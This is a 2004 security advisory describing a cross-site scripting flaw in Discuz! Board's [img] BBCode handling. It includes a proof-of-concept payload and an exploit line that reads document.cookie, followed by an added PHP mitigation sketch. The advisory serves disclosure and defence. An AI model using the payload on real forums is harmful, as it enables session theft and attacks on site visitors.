Discuz! Board XSS
Possible Cross Site Scripting in Discuz! Board



Advisory Name: Possible Cross Site Scripting in Discuz! Board

Release Date: Feb 5, 2004

Application: Discuz! Board

Version Affected: 2.x, 3.x

Platform: PHP

Severity: Low

Discovered by: Cheng Peng Su (apple_soup_at_msn.com)

Vendor URL: http://www.discuz.com/ 

################################################

Proof Of Concept:

   A thread containing:

       [img]http://a.gif');(xss code);a=escape('a[/img] 

   will be rendered as:

       <img src="http://a.gif');(xss code);a=escape=('a" border="0" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window';}" onmouseover="if(this.resized) this.style.cursor='hand';" onclick="if(this.resized) window.open('http://site/pic.gif');(xss code);a=escape('a');">



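   So there will be a red 'x' instead of a normal picture. If a visitor clicks the red 'x', the code will be executed, because the image URL is copied unescaped into the single-quoted window.open() argument of the onclick handler.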

   I think you know why I add ";a=escape('a" after the xss code.



Exploit:

   [img]http://a.gif');alert(document.cookie);a=escape=('a[/img] 
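
Mitigation sketch (an added example, not Discuz! source and not part of the original advisory): an [img] renderer that accepts only allowlisted http/https URLs and never places the URL inside an inline event handler. The names render_img_bbcode, IMG_URL_PATTERN and the bbimg class are hypothetical.

```php
<?php
// Added example, not Discuz! code. All names here are hypothetical.

// Allowlist: http/https, plain host, optional port, path and query.
// Quotes, parentheses, semicolons, spaces and angle brackets never match.
const IMG_URL_PATTERN =
    '#\Ahttps?://[A-Za-z0-9.-]+(?::[0-9]{1,5})?(?:/[A-Za-z0-9._~%/+-]*)?(?:\?[A-Za-z0-9._~%&=+-]*)?\z#';

function render_img_bbcode(string $post): string
{
    // 1. Neutralise all markup in the post, including both quote characters.
    $safe = htmlspecialchars($post, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // 2. Turn [img]...[/img] into a tag only when the URL passes the allowlist.
    $out = preg_replace_callback(
        '#\[img\](.*?)\[/img\]#is',
        function (array $m): string {
            // Undo step 1 for this span so the raw URL is what gets validated.
            $url = htmlspecialchars_decode($m[1], ENT_QUOTES);
            if (preg_match(IMG_URL_PATTERN, $url) !== 1) {
                return $m[0]; // rejected: stays as escaped plain text
            }
            $src = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
            // No onload/onclick attributes: the URL never reaches a script
            // context. Size limits belong in the stylesheet, for example
            // .bbimg { max-width: 70%; } (hypothetical rule).
            return '<img src="' . $src . '" alt="" class="bbimg">';
        },
        $safe
    );

    return $out ?? $safe; // fall back to the escaped text on a PCRE error
}

// Constructed sample posts: one ordinary image, one with the shape shown in
// the advisory's proof of concept.
$samples = [
    '[img]http://example.test/pic.gif[/img]',
    "[img]http://a.gif');(xss code);a=escape('a[/img]",
];

foreach ($samples as $post) {
    echo render_img_bbcode($post), "\n";
}
```

The first sample becomes an img element; the second fails the allowlist and is emitted as inert, HTML-escaped text.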
